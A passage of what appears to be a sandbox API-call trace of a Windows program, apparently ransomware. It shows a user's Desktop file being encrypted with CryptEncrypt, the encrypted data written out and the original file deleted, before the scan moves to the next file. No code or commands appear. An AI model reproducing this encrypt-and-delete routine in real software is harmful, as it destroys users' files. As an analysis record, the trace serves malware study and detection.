lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.712] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0122.712] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0122.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0122.713] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.713] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.713] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.713] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.715] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cabc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.715] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x17903, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x17910) returned 1 [0122.715] CharLowerBuffW (in: lpsz="byte[96529]", cchLength=0xb | out: lpsz="byte[96529]") returned 0xb [0122.718] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb048, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.718] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f0048*, pdwDataLen=0x144e790*=0x17903, dwBufLen=0x17910 | out: pbData=0x48f0048*, pdwDataLen=0x144e790*=0x17910) returned 1 [0122.719] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.719] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.719] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.721] WriteFile (in: hFile=0x258, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x17910, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144f194*=0x17910, lpOverlapped=0x0) returned 1 [0122.723] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0122.723] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.723] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caa00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0122.723] CryptDestroyKey (hKey=0x41ac6c0) returned 1 [0122.723] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.723] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.723] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.723] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.723] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.723] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.723] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.724] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0122.724] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0122.724] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.724] FreeLibrary (hLibModule=0x756e0000) returned 1 [0122.724] CloseHandle (hObject=0x2a0) returned 1 [0122.727] CloseHandle (hObject=0x258) returned 1 [0122.731] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CtmEppS 7Ks0.swf", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CtmEppS 7Ks0.swf", lpFilePart=0x0) returned 0x28 [0122.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0122.731] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CtmEppS 7Ks0.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\ctmepps 7ks0.swf")) returned 0x20 [0122.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0122.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0122.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0122.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0122.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0122.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0122.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0122.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0122.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392340 [0122.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0122.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0122.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0122.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0122.732] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CtmEppS 7Ks0.swf", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1321e690, ftCreationTime.dwHighDateTime=0x1d5eccc, ftLastAccessTime.dwLowDateTime=0x4cc2b900, ftLastAccessTime.dwHighDateTime=0x1d5e6b0, ftLastWriteTime.dwLowDateTime=0x4cc2b900, ftLastWriteTime.dwHighDateTime=0x1d5e6b0, nFileSizeHigh=0x0, nFileSizeLow=0x17903, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="CtmEppS 7Ks0.swf", cAlternateFileName="CTMEPP~1.SWF")) returned 0x41ac640 [0122.732] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CtmEppS 7Ks0.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\ctmepps 7ks0.swf")) returned 1 [0122.733] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1321e690, ftCreationTime.dwHighDateTime=0x1d5eccc, ftLastAccessTime.dwLowDateTime=0x4cc2b900, ftLastAccessTime.dwHighDateTime=0x1d5e6b0, ftLastWriteTime.dwLowDateTime=0x4cc2b900, ftLastWriteTime.dwHighDateTime=0x1d5e6b0, nFileSizeHigh=0x0, nFileSizeLow=0x17903, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="CtmEppS 7Ks0.swf", cAlternateFileName="CTMEPP~1.SWF")) returned 0 [0122.734] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0122.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0122.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0122.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0122.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0122.735] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0122.735] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9940 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0122.735] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.735] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0122.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0122.735] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0122.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0122.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0122.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0122.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0122.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0122.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0122.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0122.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0122.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0122.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0122.736] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0122.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0122.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0122.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.737] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0122.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0122.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0122.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0122.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0122.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.737] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac500 [0122.737] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0122.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0122.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0122.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0122.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0122.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0122.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0122.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43924c8 [0122.737] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0122.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43924c8 | out: hHeap=0x1780000) returned 1 [0122.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0122.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0122.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21f0 [0122.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0122.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0122.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c20 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0122.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0122.738] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 